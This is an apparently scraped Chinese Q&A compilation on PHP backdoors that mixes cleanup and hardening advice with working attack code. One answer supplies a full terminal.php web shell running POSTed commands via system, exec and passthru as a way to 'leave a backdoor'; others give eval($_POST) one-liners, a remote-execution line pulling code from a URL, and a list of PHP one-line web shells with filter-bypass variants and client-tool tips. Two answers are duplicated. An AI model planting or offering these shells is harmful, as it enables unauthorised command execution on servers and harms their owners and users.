⑴ 怎麼看php程序是否有後門
的程序,想做個後門,是嗎
那很容易啊,在 函數文件里寫個綜合函數,做重要工作時調用它,而且不能刪除,刪除了或者更改了,整個程序無法使用。
然後通過這個函數,寫你要做的事情呀。
⑵ PHP網站後門怎麼清除
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
網站掛馬是每個網站最頭痛的問題,解決辦法:1.在程序中很容易找到掛馬的代碼,直接刪除,或則將你沒有傳伺服器的源程序覆蓋一次但反反復復被掛就得深入解決掉此問題了。但這不是最好的解決辦法。最好的方法還是找專業做安全的來幫你解決掉
聽朋友說 SineSafe 不錯 你可以去看看。
清馬+修補漏洞=徹底解決
所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒
清馬
1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!
⑶ PHP木馬後門是什麼
後門木馬簡單點說就是隱蔽性很高的木馬。比如灰鴿子。後門木馬就是一種由原作者在編寫的木馬設置了一個後門程序,比如按6下shift就彈出許可權設置,這種快捷鍵一般只有原作者才知道的,然後原作者把這種木馬賣出,比如你買了他的木馬並且使用,你不知道快捷鍵密碼,所以最高許可權不在你這,而在他那兒~這樣你利用木馬盜號的過程中原作者就會知道,也就是說原作者可能利用你盜號,你所盜的號你知道,原作者也會知道。
如果你的電腦中了後門木馬病毒,你可以這樣,先下載360系統急救箱保存到D盤,重啟按F8進入帶網路連接的安全模式,使用360系統急救箱進行查殺 這樣就查殺的比較徹底了,然後啟動360殺毒 360安全衛士的木馬雲查殺功能查殺清除殘留就可以了.
⑷ php網站怎麼留後門
在php.ini中設置開啟exec() system()等函數
創建 terminal.php 文件如下
<?php
!(isset($_POST['parma'])&&$_POST['parma']!='')&&exit("請輸入需要執行的shell命令");
!(isset($_POST['type'])&&$_POST['type']!='')&&exit("請輸入調用函數的類型");
$parma=$_POST['parma'];
switch($_POST['type']){
case'system':
returnsystem($parma);
break;
case'exec':
returnexec($parma,$return);
break;
case'passthru':
returnpassthru($parma);
break;
default:
exit;
}
?>
⑸ php如何留後門
試試php加密,還有,上面的只是正版驗證,談不上後門。
加個在線驗證,比如域名與伺服器上資料庫中對比,不在的,下面就不處理,直接結束。
如果在列表中的,正常處理數據。
⑹ php後門怎麼用
試試php加密,還有,上面的只是正版驗證,談不上後門。
加個在線驗證,比如域名與伺服器上資料庫中對比,不在的,下面就不處理,直接結束。
如果在列表中的,正常處理數據。
⑺ php源碼開源有沒有可能做後門
代碼後門大多是一句話,
比如:
eval($_POST['backdoor']);
//樓主大多注意獲取數據的來源是否可靠
//注意接受表單數據函數如:$_POST[];$_GET[];
//和注意文件的讀寫,最可怕的是這個:
eval(file_get_contents('http://www/shell.html'));//等等
//這個叫做遠程執行,如果發現異常,請立馬開啟PHP的安全模式,再慢慢排查!
⑻ PHP源碼後門。
危險
把$uin和$pwd傳送到這個網站
如果你不信任這個網站,這是很危險的.
這個網站可以獲得這兩個值
⑼ 一個有意思的 PHP 一句話後門,怎麼破
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容錯代碼
<?php assert($_POST1);?>//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用這個後,使用菜刀一句話客戶端在
配置連接的時候在"配置"一欄輸入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//繞過<?限制的一句話
<script language="php">@eval_r($_POST[sb])</script>